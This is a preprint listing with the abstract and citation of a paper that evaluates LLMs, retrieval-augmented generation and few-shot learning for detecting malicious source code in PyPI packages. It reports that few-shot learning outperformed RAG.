Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy?
Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy?
Malicious software packages in open-source ecosystems, such as PyPI, pose growing security risks. Unlike traditional vulnerabilities, these packages are intentionally designed to deceive users, making detection challenging due to evolving attack methods and the lack of structured datasets. In this work, we empirically evaluate the effectiveness of Large Language Models (LLMs), Retrieval-Augmented Generation (RAG), and few-shot learning for detecting malicious source code. We fine-tune LLMs on curated datasets and integrate YARA rules, GitHub Security Advisories, and malicious code snippets with the aim of enhancing classification accuracy. We came across a counterintuitive outcome: While RAG is expected to boost up the prediction performance, it fails in the performed evaluation, obtaining a mediocre accuracy. In contrast, few-shot learning is more effective as it significantly improves the detection of malicious code, achieving 97% accuracy and 95% balanced accuracy, outperforming traditional RAG approaches. Thus, future work should expand structured knowledge bases, refine retrieval models, and explore hybrid AI-driven cybersecurity solutions.
Motunrayo Ibiyo、Thinakone Louangdy、Phuong T. Nguyen、Claudio Di Sipio、Davide Di Ruscio
计算技术、计算机技术安全科学
Motunrayo Ibiyo,Thinakone Louangdy,Phuong T. Nguyen,Claudio Di Sipio,Davide Di Ruscio.Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy?[EB/OL].(2025-04-18)[2025-04-26].https://arxiv.org/abs/2504.13769.点此复制
评论